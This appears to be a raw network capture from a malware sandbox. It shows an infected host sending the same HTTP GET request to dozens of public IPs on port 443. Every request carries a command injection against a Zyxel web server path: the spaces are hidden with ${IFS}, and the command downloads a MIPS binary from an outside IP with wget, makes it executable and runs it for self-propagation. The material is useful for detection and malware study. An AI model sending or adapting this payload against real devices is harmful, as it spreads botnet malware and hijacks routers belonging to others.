                                                        Feb 2, 2024 06:21:10.943617105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4541192.168.2.1448088200.220.113.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943649054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4542192.168.2.1457134182.70.149.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943706989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4543192.168.2.1452262157.29.204.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943727970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4544192.168.2.1453720143.198.236.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943770885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4545192.168.2.1448106137.64.104.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943797112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4546192.168.2.144699290.28.26.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943826914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4547192.168.2.1434298170.167.141.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943886042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4548192.168.2.1453072179.199.25.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943909883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4549192.168.2.1437944172.57.90.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943941116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4550192.168.2.1452646150.18.4.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943998098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4551192.168.2.1446772119.199.236.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944032907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4552192.168.2.145435612.172.142.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944075108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4553192.168.2.1447852118.241.108.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944120884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4554192.168.2.1439466153.84.137.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944154024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4555192.168.2.1458806178.101.135.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944169998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4556192.168.2.1456462194.7.51.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944216967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4557192.168.2.1439848175.164.93.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944231987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4558192.168.2.1438944186.67.24.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944299936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4559192.168.2.143646639.156.8.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944350958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4560192.168.2.144355440.128.182.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944402933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4561192.168.2.1442082202.27.189.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944443941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4562192.168.2.1448534117.99.2.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944473982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4563192.168.2.145481494.120.219.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944514036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4564192.168.2.1452772128.225.44.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944567919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4565192.168.2.14509968.13.158.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944612980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4566192.168.2.143817474.121.149.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944658041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4567192.168.2.1445800142.37.170.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944689989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4568192.168.2.14609584.215.121.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944720030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4569192.168.2.1446114149.66.161.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944770098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4570192.168.2.1445052164.187.232.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944803953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4571192.168.2.1457008107.151.186.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944832087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4572192.168.2.1446726168.77.159.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944890976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4573192.168.2.143731889.102.41.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944933891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4574192.168.2.1450906136.145.211.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944958925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4575192.168.2.1451460213.186.65.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.944997072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4576192.168.2.1440718210.183.201.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945019007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4577192.168.2.1445184100.30.101.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945069075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4578192.168.2.144206254.92.217.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945096970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4579192.168.2.1443908174.207.81.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945127010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4580192.168.2.1454930104.7.175.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945193052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4581192.168.2.145230658.229.226.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945226908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4582192.168.2.145097285.149.236.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945262909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4583192.168.2.144393617.218.164.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945300102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4584192.168.2.1451688147.53.23.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945338964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4585192.168.2.1459706112.113.17.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945364952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4586192.168.2.143872878.227.85.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945415020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4587192.168.2.143910076.143.208.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945480108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4588192.168.2.145665271.200.146.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945504904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4589192.168.2.1460874104.32.87.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945544958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4590192.168.2.1436036186.213.107.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945569038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4591192.168.2.14540622.164.118.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945631027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4592192.168.2.1450168120.123.15.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945678949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4593192.168.2.1452616143.250.32.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945724010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4594192.168.2.1444490140.227.185.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945759058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4595192.168.2.1452904105.10.128.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945800066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4596192.168.2.145715689.198.202.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945861101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4597192.168.2.1436414105.22.193.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945897102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4598192.168.2.1434774222.102.196.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945945024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4599192.168.2.143343866.191.223.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.945971012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4600192.168.2.1433130218.32.222.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946027994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4601192.168.2.1437990104.63.182.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946063995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4602192.168.2.1452156223.111.193.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946101904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4603192.168.2.145763872.1.64.15443
                                                        TimestampBytes transferredDirectionData
